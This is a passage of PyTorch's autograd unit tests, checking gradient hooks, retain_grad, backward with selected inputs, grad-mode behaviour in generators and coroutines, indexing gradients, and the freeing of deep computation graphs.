self.assertRaisesRegex(TypeError, error_regex): y.grad_fn(x.detach(), x.detach()) # too many with self.assertRaisesRegex(TypeError, error_regex): y.grad_fn() # too few y.grad_fn(x.detach()) # this should succeed def test_grad_unreachable(self): x = torch.ones(1, requires_grad=True) y = torch.ones(1, requires_grad=True) # Make sure x and y have grad accumulators allocated z = x * 2 w = y * 2 grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True) self.assertEqual(grad_x, x * 2) self.assertIsNone(grad_y) # This is slightly different than the case above, because z doesn't even # have a grad accumulator allocated. 
z = torch.ones(1, requires_grad=True) grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True) self.assertEqual(grad_x, x * 2) self.assertIsNone(grad_z) # allow_unused=False, but grads contains None inside, should throw with self.assertRaisesRegex(RuntimeError, "Set allow_unused=True"): grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False) def test_grad_unreachable_discovery(self): # Test that certain nodes are not erroneously executed when an input # is unreachable. See #39784 class MyFunc(torch.autograd.Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, x): self.fail("This node should not be executed!") x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2) y = torch.randn(1, requires_grad=True) (gY,) = torch.autograd.grad(x, (y, ), allow_unused=True) self.assertIsNone(gY) x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2) y = torch.randn(1, requires_grad=True) z = torch.randn(1, requires_grad=True) (gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True) self.assertIsNone(gY) self.assertIsNotNone(gZ) x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2) y = torch.randn(1, requires_grad=True) torch.autograd.backward(x, inputs=(y, )) # allow_unused is implicitly True! self.assertIsNone(y.grad) def test_hooks(self): x = torch.ones(5, 5, requires_grad=True) y = torch.ones(5, 5) * 4 y.requires_grad_(True) counter = [0] def bw_hook(inc, grad): self.assertIsInstance(grad, torch.Tensor) counter[0] += inc z = x ** 2 + x * 2 + x * y + y x.register_hook(lambda *args: bw_hook(0, *args)) test = z.register_hook(lambda *args: bw_hook(1, *args)) z.backward(torch.ones(5, 5), retain_graph=True) self.assertEqual(counter[0], 1) test2 = z.register_hook(lambda *args: bw_hook(2, *args)) z.backward(torch.ones(5, 5), retain_graph=True) self.assertEqual(counter[0], 4) test2.remove() z.backward(torch.ones(5, 5), retain_graph=True) self.assertEqual(counter[0], 5) def bw_hook_modify(grad): return grad.mul(2) test.remove() z.register_hook(bw_hook_modify) with torch.no_grad(): y.grad.zero_() z.backward(torch.ones(5, 5), retain_graph=True) self.assertEqual(y.grad, (x + 1) * 2) y.register_hook(bw_hook_modify) with torch.no_grad(): y.grad.zero_() z.backward(torch.ones(5, 5)) self.assertEqual(y.grad, (x + 1) * 4) def test_hooks_cpp(self): # Tests hooks for autograd function implemented in C++ bn = torch.nn.BatchNorm1d(5, affine=False) bn.double() bn.eval() counter = [0] def bw_hook(grad): counter[0] += 1 return grad * 2 x = torch.ones(5, 5, dtype=torch.double, requires_grad=True) z = bn(x) z.register_hook(bw_hook) z.sum().backward() self.assertEqual(counter[0], 1, msg='bw_hook not called') self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0) def test_hook_none(self): # WARNING: this is a test for autograd internals. # You should never have to use such things in your code. 
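        # --- Illustrative sketch (hypothetical helper, added for exposition).
        # The hook tests above rely on register_hook() returning a removable
        # handle and on a hook's return value replacing the gradient. A small
        # standalone example of both behaviours, assuming only public APIs:
        def _sketch_grad_hook_scaling_and_removal():
            import torch
            x = torch.ones(3, requires_grad=True)
            handle = x.register_hook(lambda grad: grad * 2)   # double the grad
            (x * 3).sum().backward()
            assert torch.equal(x.grad, torch.full((3,), 6.))  # 3 doubled to 6
            handle.remove()                                   # detach the hook
            x.grad = None
            (x * 3).sum().backward()
            assert torch.equal(x.grad, torch.full((3,), 3.))  # back to plain 3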
class NoneGradientFunction(Function): @staticmethod def forward(ctx, x, y): assert ctx.needs_input_grad[0] assert not ctx.needs_input_grad[1] return x, y @staticmethod def backward(ctx, grad_x, grad_y): return grad_x, None was_called = [False] def hook(grad): self.assertIsNotNone(grad) was_called[0] = True x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5, 5) rx, ry = NoneGradientFunction.apply(x, y) rx.register_hook(hook) ry.register_hook(hook) sum(rx, ry).sum().backward() self.assertTrue(was_called[0]) def test_retain_grad(self): input = torch.rand(1, 3, requires_grad=True) h1 = input * 3 out = (h1 * h1).sum() # It should be possible to call retain_grad() multiple times h1.retain_grad() h1.retain_grad() # Gradient should be accumulated out.backward(retain_graph=True) self.assertEqual(h1 * 2, h1.grad) out.backward(retain_graph=True) self.assertEqual(h1 * 4, h1.grad) with torch.no_grad(): input.grad.zero_() # It should be a no-op for leaves input.retain_grad() input.retain_grad() out.backward() self.assertEqual(input * 18, input.grad) def test_retain_grad_cycle(self): x = torch.ones(5, 5, requires_grad=True) def run_test(): y = x * 2 y.retain_grad() return y / 2, torch._C._WeakTensorRef(y) z, ref = run_test() self.assertTrue(ref.expired()) z.sum().backward() def test_backward(self): v = torch.randn(5, 5, requires_grad=True) x = torch.randn(5, 5, requires_grad=True) y = (torch.rand(5, 5) + 0.1).requires_grad_(True) z = torch.randn(5, 5, requires_grad=True) grad_output = torch.randn(5, 5) v.backward(grad_output) self.assertEqual(v.grad, grad_output) a = x + (y * z) + 4 * z ** 2 * x / y a.backward(grad_output) x_grad = 4 * z.pow(2) / y + 1 y_grad = z - 4 * x * z.pow(2) / y.pow(2) z_grad = 8 * x * z / y + y self.assertEqual(x.grad, x_grad * grad_output) self.assertEqual(y.grad, y_grad * grad_output) self.assertEqual(z.grad, z_grad * grad_output) def test_sparse_mm_backward(self): size = (3, 3) sparse = torch.sparse_coo_tensor(size, requires_grad=True) dense = torch.randn(size, requires_grad=True) with self.assertRaisesRegex( RuntimeError, "The backward pass for this operation requires the 'mat1' tensor to be strided,"): z = dense.addmm(sparse, dense) mm_test_cases = [ # a requires grad, a is sparse, b requires grad, b is sparse, error message (False, True, True, False, None), (False, False, True, True, "The backward pass for this operation requires the 'mat2'"), (False, True, True, True, "The backward pass for this operation requires the 'mat2'"), (True, False, True, True, "The backward pass for this operation requires the 'mat2'"), (True, True, False, False, "The backward pass for this operation requires the 'self'"), (True, True, True, False, "The backward pass for this operation requires the 'self'"), (True, True, True, True, "The backward pass for this operation requires the 'mat2'"), ] for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases: # We should only be testing cases with sparse inputs, and at least one # input needs to require grad so we can call a backward pass assert a_is_sparse or b_is_sparse assert a_req_grad or b_req_grad a = torch.randn(size, requires_grad=a_req_grad) if a_is_sparse: a = a.to_sparse() b = torch.randn(size, requires_grad=b_req_grad) if b_is_sparse: b = b.to_sparse() # If no error expected, check that sparse and dense cases match if err_msg is None: r = a.mm(b) r.sum().backward() a_grad = None if a.grad is None else a.grad.clone().detach() b_grad = None if b.grad is None else b.grad.clone().detach() # Redo with only dense 
tensors a = (a.to_dense() if a.is_sparse else a).clone().detach() a.requires_grad = a_req_grad b = (b.to_dense() if b.is_sparse else b).clone().detach() b.requires_grad = b_req_grad r = a.mm(b) r.sum().backward() self.assertEqual(a_grad, a.grad) self.assertEqual(b_grad, b.grad) else: with self.assertRaisesRegex(RuntimeError, err_msg): a.mm(b) def test_multi_backward(self): x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5, 5, requires_grad=True) q = torch.randn(5, 5, requires_grad=True) a = torch.randn(5, 5, requires_grad=True) b = torch.randn(5, 5, requires_grad=True) q2 = q * 2 z = x + y + q2 c = a * b + q2 grad_z = torch.randn(5, 5) grad_c = torch.randn(5, 5) torch.autograd.backward([z, c], [grad_z, grad_c]) self.assertEqual(x.grad, grad_z) self.assertEqual(y.grad, grad_z) self.assertEqual(a.grad, grad_c * b) self.assertEqual(b.grad, grad_c * a) self.assertEqual(q.grad, (grad_c + grad_z) * 2) def test_multi_backward_no_grad(self): x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5, 5, requires_grad=False) z = x + y q = y * 2 # NB: we currently raise an exception if any arguments to backwards # have requires_grad=False and don't have a grad_fn. We may want to # relax that check to a warning. def call_backwards(): torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)]) self.assertRaises(RuntimeError, call_backwards) def test_backward_with_inputs(self): x = torch.randn(2, 2, dtype=torch.double, requires_grad=True) y = torch.randn(2, 2, dtype=torch.double, requires_grad=True) def fn(): return x ** 2 + y * x + y ** 2 gradient = torch.ones(2, 2) x_grad_expected = 2 * x + y y_grad_expected = x + 2 * y @torch.no_grad() def reset_grad(): x.grad.zero_() y.grad.zero_() torch.autograd.backward(fn(), gradient, inputs=[x, y]) self.assertEqual(x.grad, x_grad_expected) self.assertEqual(y.grad, y_grad_expected) reset_grad() torch.autograd.backward(fn(), gradient, inputs=[x]) self.assertEqual(x.grad, x_grad_expected) self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False) reset_grad() torch.autograd.backward(fn(), gradient, inputs=[y]) self.assertEqual(y.grad, y_grad_expected) self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False) reset_grad() torch.autograd.backward(fn(), gradient, inputs=y) self.assertEqual(y.grad, y_grad_expected) self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False) reset_grad() self.assertRaisesRegex(RuntimeError, 'cannot be empty', lambda: torch.autograd.backward(fn(), gradient, inputs=[])) def test_backward_with_nonleaf_inputs(self): x = torch.randn(2, 2, dtype=torch.double, requires_grad=True) x_nonleaf = x * 1 y = torch.randn(2, 2, dtype=torch.double, requires_grad=True) z = torch.randn(2, 2, dtype=torch.double, requires_grad=True) out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2 out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y]) x_grad_expected = 2 * x + y y_grad_expected = x + 2 * y self.assertEqual(y.grad, y_grad_expected) self.assertEqual(x.grad, x_grad_expected) self.assertRaisesRegex(RuntimeError, 'not a leaf Tensor', lambda: out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])) # backward doesn't have an allow_unused flag, so the behavior of backward # when variable is not part of the graph is as if allow_used were true # x.grad will simply be None. 
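        # --- Illustrative sketch (hypothetical helper, added for exposition).
        # Summarising the behaviour described in the comment above: the
        # `inputs` argument of backward() restricts which leaves receive
        # gradients, and a leaf that is not part of the graph just keeps
        # grad=None (backward() has no allow_unused flag):
        def _sketch_backward_inputs_subset():
            import torch
            x = torch.randn(2, requires_grad=True)
            y = torch.randn(2, requires_grad=True)
            z = torch.randn(2, requires_grad=True)   # not used in the graph
            out = (x * y).sum()
            torch.autograd.backward(out, inputs=[x], retain_graph=True)
            assert torch.allclose(x.grad, y)         # only x accumulates
            assert y.grad is None
            torch.autograd.backward(out, inputs=[z])
            assert z.grad is None                    # unreachable leaf: no-op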
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z]) self.assertIsNone(z.grad) def test_dependent_backward(self): x = torch.randn(10, requires_grad=True) y = x ** 2 z = y ** 3 go_y = torch.randn(10) go_z = torch.randn(10) torch.autograd.backward([y, z], [go_y, go_z]) xd = x self.assertEqual(x.grad, 2 * xd * go_y + 6 * xd.pow(5) * go_z) def test_save_output_nr(self): x = torch.randn(10, requires_grad=True) class MultiOutputFn(Function): @staticmethod def forward(ctx, x): return x[:5], x[5:] @staticmethod def backward(ctx, *grad): return torch.cat(grad) a, b = MultiOutputFn.apply(x) self.assertEqual(b.output_nr, 1) class TestFn(Function): @staticmethod def forward(ctx, b): ctx.save_for_backward(b) return b * 2 @staticmethod def backward(ctx, grad_b): b, = ctx.saved_tensors self.assertEqual(b.output_nr, 1) TestFn.apply(b).sum().backward() def test_free_deep_graph(self): def scope(): depth = 150000 x = torch.randn(1, requires_grad=True) y = x.clone() # build a "chain" computation graph for _ in range(depth): y = y + y * 0.000001 # graph deletion occurs when the above locals go out of scope. # In this case `del y` will trigger it but it's easier to leave # it to Python to delete the locals. # Should not stack overflow scope() def test_free_deep_graph_complicated(self): def scope(): depth = 100000 randchoice = torch.randint(2, [depth, 2]) x = torch.randn(1, requires_grad=True) y = x.clone() # Hold the two previous values prev_values = [None, None] # Build a "chain with skip connections" graph for _ in range(depth): prev_tensors = [tensor for tensor in prev_values[:-1] if tensor is not None] prev_values.append(y) prev_values.pop(0) # Definitely pick one tensor to add y += y * 0.000001 # Possibly add other tensors nprev = len(prev_tensors) if nprev == 2: y += randchoice[depth].mul(torch.cat(prev_tensors)).sum() # graph deletion occurs when the above locals go out of scope. # Should not stack overflow scope() def test_free_deep_graph_pyfunction(self): class MyOp(Function): @staticmethod def forward(ctx, tensor1, tensor2): return tensor1 + tensor2 @staticmethod def backward(ctx, grad_output): return grad_output, grad_output def scope(): depth = 150000 x = torch.randn(1, requires_grad=True) y = x.clone() # build deeply nested computation graph for _ in range(depth): y = MyOp.apply(y, y) # graph deletion occurs when the above locals go out of scope. # Should not stack overflow scope() def test_no_unnecessary_save(self): # If we kept x in the derivative Function of x * 2 we would # get an error in the backward that would complain that we've # modified x, which was needed for gradient computation. # Since we should elide unnecessary saves, this test should pass. 
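        # --- Illustrative sketch (hypothetical helper, added for exposition).
        # The comment above refers to the version-counter check that fires
        # when a tensor saved for backward is later modified in place. A
        # minimal reproduction of that error, using only public APIs:
        def _sketch_saved_tensor_version_check():
            import torch
            x = torch.randn(3, requires_grad=True)
            a = x + 0            # non-leaf, so in-place ops are allowed
            y = a * a            # Mul saves `a` for its backward
            a.add_(1)            # bumps a's version counter
            try:
                y.sum().backward()
                raise AssertionError("expected a version-counter RuntimeError")
            except RuntimeError:
                pass             # "... modified by an inplace operation"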
mu = torch.ones(1, requires_grad=True) x = torch.empty(1) loss = 0 for i in range(3): x.detach_() x.copy_(mu + i) ft = torch.tensor([float(i)]) multiplied = x * ft s = multiplied.sum() loss += s loss.backward() def test_no_grad(self): x = torch.ones(5, 5, requires_grad=True) y = torch.ones(5, 5) * 4 with torch.no_grad(): w = x + y @torch.no_grad() def adder(x, y): return x + y z = adder(x, y) self.assertFalse(w.requires_grad) self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5))) self.assertIsNone(w.grad_fn) self.assertFalse(z.requires_grad) self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5))) self.assertIsNone(z.grad_fn) # test nested decorator and with-statement on no_grad with torch.no_grad(): self.assertFalse(torch.is_grad_enabled()) w = adder(x, y) self.assertFalse(torch.is_grad_enabled()) def test_set_grad_generator_functions(self): @torch.no_grad() def gen_no_grad(): for i in range(10): self.assertEqual(torch.is_grad_enabled(), False) yield i with torch.enable_grad(): for _ in gen_no_grad(): self.assertEqual(torch.is_grad_enabled(), True) @torch.enable_grad() def gen_enable_grad(): for i in range(10): self.assertEqual(torch.is_grad_enabled(), True) yield i with torch.no_grad(): for _ in gen_enable_grad(): self.assertEqual(torch.is_grad_enabled(), False) def test_set_grad_generator_functions_recursive(self): # enable_grad_decorator_recursive and no_grad_decorator_recursive call each other # recursively, to ensure that the decorators preserve the caller's setting @torch.enable_grad() def enable_grad_decorator_recursive(depth): self.assertTrue(torch.is_grad_enabled()) if depth > 0: no_grad_decorator_recursive(depth - 1) self.assertTrue(torch.is_grad_enabled()) @torch.no_grad() def no_grad_decorator_recursive(depth): self.assertFalse(torch.is_grad_enabled()) if depth > 0: enable_grad_decorator_recursive(depth - 1) self.assertFalse(torch.is_grad_enabled()) # enable_grad_context_manager_recursive and no_grad_context_manager_recursive call # each other recursively, to ensure that the decorators preserve the caller's setting def enable_grad_context_manager_recursive(depth): with torch.enable_grad(): self.assertTrue(torch.is_grad_enabled()) if depth > 0: no_grad_context_manager_recursive(depth - 1) self.assertTrue(torch.is_grad_enabled()) def no_grad_context_manager_recursive(depth): with torch.no_grad(): self.assertFalse(torch.is_grad_enabled()) if depth > 0: enable_grad_context_manager_recursive(depth - 1) self.assertFalse(torch.is_grad_enabled()) with torch.enable_grad(): self.assertTrue(torch.is_grad_enabled()) enable_grad_decorator_recursive(10) self.assertTrue(torch.is_grad_enabled()) enable_grad_context_manager_recursive(10) self.assertTrue(torch.is_grad_enabled()) with torch.no_grad(): self.assertFalse(torch.is_grad_enabled()) enable_grad_decorator_recursive(10) self.assertFalse(torch.is_grad_enabled()) enable_grad_context_manager_recursive(10) self.assertFalse(torch.is_grad_enabled()) def test_set_grad_coroutines(self): @torch.no_grad() def coro_no_grad(n=10): self.assertFalse(torch.is_grad_enabled()) for i in range(n): self.assertFalse(torch.is_grad_enabled()) r = yield i self.assertFalse(torch.is_grad_enabled()) self.assertEqual(i, r) self.assertFalse(torch.is_grad_enabled()) @torch.enable_grad() def coro_enable_grad(n=10): self.assertTrue(torch.is_grad_enabled()) for i in range(n): self.assertTrue(torch.is_grad_enabled()) r = yield i self.assertTrue(torch.is_grad_enabled()) self.assertEqual(i, r) self.assertTrue(torch.is_grad_enabled()) with 
torch.enable_grad(): self.assertTrue(torch.is_grad_enabled()) coro, r = coro_no_grad(), None try: while True: self.assertTrue(torch.is_grad_enabled()) r = coro.send(r) self.assertTrue(torch.is_grad_enabled()) except StopIteration: pass with torch.no_grad(): self.assertFalse(torch.is_grad_enabled()) coro, r = coro_enable_grad(), None try: while True: self.assertFalse(torch.is_grad_enabled()) r = coro.send(r) self.assertFalse(torch.is_grad_enabled()) except StopIteration: pass def test_set_grad_coroutines_benign_exceptions(self): class RecoverableException(Exception): pass @torch.no_grad() def coro_no_grad(n=10): has_raised = False for i in range(n): try: self.assertFalse(torch.is_grad_enabled()) yield (-i if has_raised else i) except RecoverableException: self.assertFalse(torch.is_grad_enabled()) has_raised = True @torch.enable_grad() def coro_enable_grad(n=10): has_raised = False for i in range(n): try: self.assertTrue(torch.is_grad_enabled()) yield (-i if has_raised else i) except RecoverableException: self.assertTrue(torch.is_grad_enabled()) has_raised = True with torch.enable_grad(): coro = coro_no_grad() assert 0 == next(coro) try: while True: r = coro.throw(RecoverableException) self.assertLess(r, 0) except StopIteration: pass with torch.no_grad(): coro = coro_enable_grad() assert 0 == next(coro) try: while True: r = coro.throw(RecoverableException) self.assertLess(r, 0) except StopIteration: pass def test_set_grad_coroutines_critical_exceptions(self): class UnrecoverableException(Exception): pass class SecondaryException(Exception): pass @torch.no_grad() def coro_no_grad(n=10): has_raised = False for i in range(n): try: self.assertFalse(torch.is_grad_enabled()) yield (-i if has_raised else i) except UnrecoverableException: self.assertFalse(torch.is_grad_enabled()) raise SecondaryException @torch.enable_grad() def coro_enable_grad(n=10): has_raised = False for i in range(n): try: self.assertTrue(torch.is_grad_enabled()) yield (-i if has_raised else i) except UnrecoverableException: self.assertTrue(torch.is_grad_enabled()) raise SecondaryException with torch.enable_grad(): coro = coro_no_grad() assert 0 == next(coro) with self.assertRaises(SecondaryException): coro.throw(UnrecoverableException) with torch.no_grad(): coro = coro_enable_grad() assert 0 == next(coro) with self.assertRaises(SecondaryException): coro.throw(UnrecoverableException) def test_set_grad_coroutines_exit(self): @torch.no_grad() def coro_no_grad(state): for i in range(10): try: self.assertFalse(torch.is_grad_enabled()) yield i except GeneratorExit: self.assertFalse(torch.is_grad_enabled()) state.add('GeneratorExit') raise @torch.enable_grad() def coro_enable_grad(state): for i in range(10): try: self.assertTrue(torch.is_grad_enabled()) yield i except GeneratorExit: self.assertTrue(torch.is_grad_enabled()) state.add('GeneratorExit') raise state = set() with torch.enable_grad(): coro = coro_no_grad(state) for i in range(5): next(coro) coro.close() self.assertTrue('GeneratorExit' in state) state = set() with torch.no_grad(): coro = coro_enable_grad(state) for i in range(5): next(coro) coro.close() self.assertTrue('GeneratorExit' in state) def test_no_grad_python_function(self): """Python Functions should respect grad mode.""" x = torch.ones(5, 5, requires_grad=True) class MyOp(Function): @staticmethod def forward(self, x): return x + 1 @staticmethod def backward(self, dy): return dy with torch.no_grad(): y = MyOp.apply(x) self.assertFalse(y.requires_grad) def test_indexing(self): x = torch.arange(1., 17).view(4, 4) y = 
Variable(x, requires_grad=True) def compare(x, y, idx, indexed_tensor, indexed_var): indexed_var_t = indexed_var.data if not isinstance(indexed_tensor, torch.Tensor): indexed_var_t = indexed_var_t[0] self.assertEqual(indexed_tensor, indexed_var_t) indexed_var.sum().backward() expected_grad = torch.empty(x.size()).fill_(0) expected_grad[idx] = 1 self.assertEqual(y.grad, expected_grad) def check_index(x, y, idx): if y.grad is not None: with torch.no_grad(): y.grad.zero_() indexed_tensor = x[idx] indexed_var = y[idx] compare(x, y, idx, indexed_tensor, indexed_var) check_index(x, y, 1) check_index(x, y, (1, 1)) check_index(x, y, slice(1, None)) check_index(x, y, slice(None, 2)) check_index(x, y, (slice(None, 2), 2)) check_index(x, y, (slice(1, 2), 2)) check_index(x, y, (1, slice(2, None))) check_index(x, y, (slice(None, None), slice(2, None))) check_index(x, y, torch.LongTensor([0, 2])) check_index(x, y, torch.rand(4, 4).bernoulli().bool()) check_index(x, y, (Ellipsis, slice(2, None))) check_index(x, y, ([0], [0])) check_index(x, y, ([1, 2, 3], [0])) check_index(x, y, ([1, 2], [2, 1])) check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]])) check_index(x, y, ([slice(None), [2, 3]])) check_index(x, y, ([[2, 3], slice(None)])) # advanced indexing, with less dim, or ellipsis check_index(x, y, ([0])) check_index(x, y, ([0], )) x = torch.arange(1., 49).view(4, 3, 4) y = Variable(x, requires_grad=True) check_index(x, y, (slice(None), [0], [0])) check_index(x, y, ([0], [0], slice(None))) check_index(x, y, (slice(None), [0, 1, 2], [0])) check_index(x, y, ([0, 1, 2], [0], slice(None))) check_index(x, y, (slice(None), [1, 2], [2, 1])) check_index(x, y, ([1, 2], [2, 1], slice(None))) check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]])) check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None))) check_index(x, y, (slice(None), slice(None), [2, 1])) check_index(x, y, (slice(None), [2, 1], slice(None))) check_index(x, y, ([2, 1], slice(None), slice(None))) # advanced indexing, with less dim, or ellipsis check_index(x, y, ([0], )) check_index(x, y, ([0], slice(None))) check_index(x, y, ([0], Ellipsis)) check_index(x, y, ([1, 2], [0, 1])) check_index(x, y, ([1, 2], [0, 1], Ellipsis)) check_index(x, y, (Ellipsis, [1, 2], [0, 1])) # advanced indexing, with a tensor wrapped in a variable z = torch.LongTensor([0, 1]) zv = Variable(z, requires_grad=False) seq = [z, Ellipsis] seqv = [zv, Ellipsis] if y.grad is not None: with torch.no_grad(): y.grad.zero_() indexed_tensor = x[seq] indexed_var = y[seqv] compare(x, y, seq, indexed_tensor, indexed_var) def test_indexing_duplicates(self): x = torch.arange(1., 17).view(4, 4) y = Variable(x, requires_grad=True) idx = torch.LongTensor([1, 1, 3, 2, 1, 2]) y[idx].sum().backward() expected_grad = torch.zeros(4, 4) for i in idx: expected_grad[i] += 1 self.assertEqual(y.grad, expected_grad) # with advanced indexing x = torch.arange(1., 17).view(4, 4) y = Variable(x, requires_grad=True) idx = [[1, 1, 3, 2, 1, 2], [0]] y[idx].sum().backward() expected_grad = torch.zeros(4, 4) for i in idx[0]: for j in idx[1]: expected_grad[i][j] += 1 self.assertEqual(y.grad, expected_grad) x = torch.arange(1., 17).view(4, 4) y = Variable(x, requires_grad=True) idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]] y[idx].sum().backward() expected_grad = torch.tensor([[0., 2., 0., 0.], [1., 0., 0., 0.], [0., 1., 0., 0.], [0., 0., 0., 0.]]) self.assertEqual(y.grad, expected_grad) x = torch.arange(1., 65).view(4, 4, 4) y = Variable(x, requires_grad=True) idx = [[1, 1, 1], slice(None), 
slice(None)] y[idx].sum().backward() expected_grad = torch.empty(4, 4, 4).zero_() expected_grad[1].fill_(3) self.assertEqual(y.grad, expected_grad) def test_index_backward_does_not_save_tensor(self): # Example from https://github.com/pytorch/pytorch/issues/24853. # if `index(tensor, indices)` saves `tensor` for backwards, then it will # trigger a version check on `tensor` during the backward pass, which # will cause the following code to error because `tensor` gets modified # by the indexing line. a = torch.tensor([1., 0, 0]) b = torch.zeros(3, requires_grad=True) tensor = b + 0 tensor[a != 0] = tensor[a != 0] tensor.backward(torch.zeros_like(tensor)) def test_volatile_deprecated(self): v = torch.autograd.torch.randn(3, 3) with warnings.catch_warnings(record=True) as w: self.assertFalse(v.volatile) self.assertIn('volatile', str(w[0].message)) def test_saved_variables_deprecated(self): class MyFunction(Function): @staticmethod def forward(ctx, tensor1, tensor2): ctx.save_for_backward(tensor1, tensor2) return tensor1 + tensor2 @staticmethod def backward(ctx, grad_output): var1, var2 = ctx.saved_variables return (grad_output, grad_output) with warnings.catch_warnings(record=True) as warns: warnings.simplefilter("always") x = torch.randn((3, 3), requires_grad=True) y = torch.randn((3, 3), requires_grad=True) MyFunction.apply(x, y).sum().backward() has_deprecated = map(lambda warn: 'deprecated' in str(warn) and 'saved_variables' in str(warn), warns) has_deprecated = reduce(lambda x, y: x or y, has_deprecated) self.assertTrue(has_deprecated) def test_requires_grad(self): x = torch.randn(5, 5) y = torch.randn(5, 5) z = torch.randn(5, 5, requires_grad=True) a = x + y self.assertFalse(a.requires_grad) b = a + z self.assertTrue(b.requires_grad) def error(): raise RuntimeError # Make sure backward isn't called on these a._backward_hooks = OrderedDict() x._backward_hooks = OrderedDict() y._backward_hooks = OrderedDict() a._backward_hooks['test'] = error x._backward_hooks['test'] = error y._backward_hooks['test'] = error b.backward(torch.ones(5, 5)) def test_requires_grad_(self): x = torch.randn(5, 5) y = torch.randn(5, 5, requires_grad=True) self.assertIs(x, x.requires_grad_()) self.assertTrue(x.requires_grad) self.assertIs(y, y.requires_grad_()) self.assertTrue(y.requires_grad) self.assertIs(x, x.requires_grad_(True)) self.assertTrue(x.requires_grad) self.assertIs(y, y.requires_grad_(True)) self.assertTrue(y.requires_grad) z = x * y self.assertRaises(RuntimeError, lambda: z.requires_grad_(False)) self.assertIs(z, z.requires_grad_()) self.assertTrue(z.requires_grad) self.assertIs(z, z.requires_grad_(True)) self.assertTrue(z.requires_grad) self.assertIs(x, x.requires_grad_(False)) self.assertFalse(x.requires_grad) self.assertIs(y, y.requires_grad_(False)) self.assertFalse(y.requires_grad) def test_requires_grad_inplace(self): a = torch.randn(5, 5) b = torch.randn(5, 5, requires_grad=True) a += b self.assertTrue(a.requires_grad) # non-leaf a = torch.randn(5, 5) + 0 b = torch.randn(5, 5, requires_grad=True) a += b self.assertTrue(a.requires_grad) def test_no_requires_grad_inplace(self): # basic case, should be able to modify inplace while requires_grad is False a = torch.randn(2, 3) a.add_(5) a.requires_grad = True a.sum().backward() self.assertEqual(a.grad, torch.ones(2, 3)) # same but with a view a = torch.randn(2, 3) b = a[:] b.add_(5) a.requires_grad = True a.sum().backward() self.assertEqual(a.grad, torch.ones(2, 3)) # should fail if requires_grad = True when we modify inplace a = torch.randn(2, 3) 
b = a[:] a.requires_grad = True with self.assertRaises(RuntimeError): a.add_(5) with self.assertRaises(RuntimeError): b.add_(5) def test_attribute_deletion(self): x = torch.randn((5, 5), requires_grad=True) del x.grad self.assertIsNone(x.grad) with self.assertRaises(RuntimeError): del x.data with self.assertRaises(TypeError): x.data = None with self.assertRaises(RuntimeError): del x.requires_grad with self.assertRaises(RuntimeError): del x._grad_fn with self.assertRaises(RuntimeError): del x._backward_hooks def test_duplicate_backward_root(self): a = torch.randn(5, 5, requires_grad=True) b = torch.randn(5, 5, requires_grad=True) x = a * b grad_output = torch.randn_like(x) torch.autograd.backward([x, x], [grad_output, grad_output]) self.assertEqual(a.grad, b * grad_output * 2) self.assertEqual(b.grad, a * grad_output * 2) def test_backward_no_grad(self): a = torch.randn(5, 5, requires_grad=True) b = a + 2 with self.assertRaises(RuntimeError): torch.autograd.backward([b], [None]) def test_backward_twice_with_saved_values(self): b = torch.randn(3, requires_grad=True, dtype=torch.double) c = torch.zeros(3, dtype=torch.double) c[[1, 2]] = b[[1, 1]] c.backward(torch.tensor([1, 1, 1], dtype=torch.double)) self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True', lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double))) def test_backward_twice_retained_graph_with_saved_values(self): b = torch.randn(3, requires_grad=True, dtype=torch.double) c = torch.zeros(3, dtype=torch.double) c[[1, 2]] = b[[1, 1]] c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True) c.backward(torch.tensor([1, 1, 1], dtype=torch.double)) def test_backward_twice_without_saved_values(self): b = torch.randn(3, requires_grad=True, dtype=torch.double) c = b + 1 c.backward(torch.tensor([1, 1, 1], dtype=torch.double)) c.backward(torch.tensor([1, 1, 1], dtype=torch.double)) def test_backward_twice_retained_graph_without_saved_values(self): b = torch.randn(3, requires_grad=True, dtype=torch.double) c = torch.zeros(3, dtype=torch.double) c[[1, 2]] = b[[1, 1]] c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True) c.backward(torch.tensor([1, 1, 1], dtype=torch.double)) def test_next_functions(self): x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5, 5, requires_grad=True) a = x + y self.assertIsNotNone(a.grad_fn) next_functions = a.grad_fn.next_functions self.assertEqual(len(next_functions), 2) self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad) self.assertEqual(next_functions[0][1], 0) self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad) self.assertEqual(next_functions[1][1], 0) b = a + 5 next_functions = b.grad_fn.next_functions self.assertEqual(len(next_functions), 2) self.assertIs(next_functions[0][0], a.grad_fn) self.assertIs(next_functions[1][0], None) def 